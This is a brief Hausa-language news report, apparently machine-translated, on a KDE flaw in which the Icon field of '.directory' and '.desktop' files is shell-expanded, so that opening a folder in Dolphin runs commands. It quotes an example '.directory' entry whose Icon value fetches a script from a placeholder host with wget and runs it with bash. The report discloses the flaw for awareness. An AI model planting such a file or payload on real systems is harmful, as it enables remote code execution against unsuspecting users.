In KDE , wanda ke bawa maharin damar aiwatar da umarni na sabani lokacin da mai amfani ya kalli kundin adireshi ko ma'ajiyar bayanai mai ƙunshe da fayiloli na musamman na ".tebur" da ".directory". Harin yana buƙatar kawai mai amfani ya duba jerin fayiloli a cikin mai sarrafa fayil na Dolphin, zazzage fayil ɗin ƙeta, ko ja gajeriyar hanya zuwa kan tebur ko cikin takarda. Matsalar tana bayyana kanta a cikin sakin dakunan karatu na yanzu da tsofaffin juzu'ai, har zuwa KDE 4. Rashin lahani har yanzu (CVE ba a sanya shi ba).
Matsalar tana faruwa ne ta hanyar aiwatar da ba daidai ba na KDesktopFile class, wanda, lokacin sarrafa ma'aunin "Icon", ba tare da tserewa da kyau ba, yana ƙaddamar da ƙimar zuwa aikin KConfigPrivate :: expandString (), wanda ke aiwatar da fadada harsashi na musamman, gami da sarrafawa. igiyoyin “$(..)” a matsayin umarni da za a aiwatar . Sabanin buƙatun ƙayyadaddun XDG, aiwatarwa ana samar da ginin harsashi ba tare da raba nau'in saitunan ba, watau. ba kawai lokacin ƙayyade layin umarni na aikace-aikacen da za a ƙaddamar ba, amma har ma lokacin tantance gumakan da aka nuna ta tsohuwa.
Misali, don kai hari aika wa mai amfani da tarihin zip tare da kundin adireshi mai ɗauke da fayil ".directory" kamar:
[Shigarwar Desktop] Nau'in=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Lokacin da kuke ƙoƙarin duba abubuwan da ke cikin rumbun adana bayanai a cikin mai sarrafa fayil ɗin Dolphin, za a sauke da aiwatar da rubutun https://example.com/FILENAME.sh.
source: budenet.ru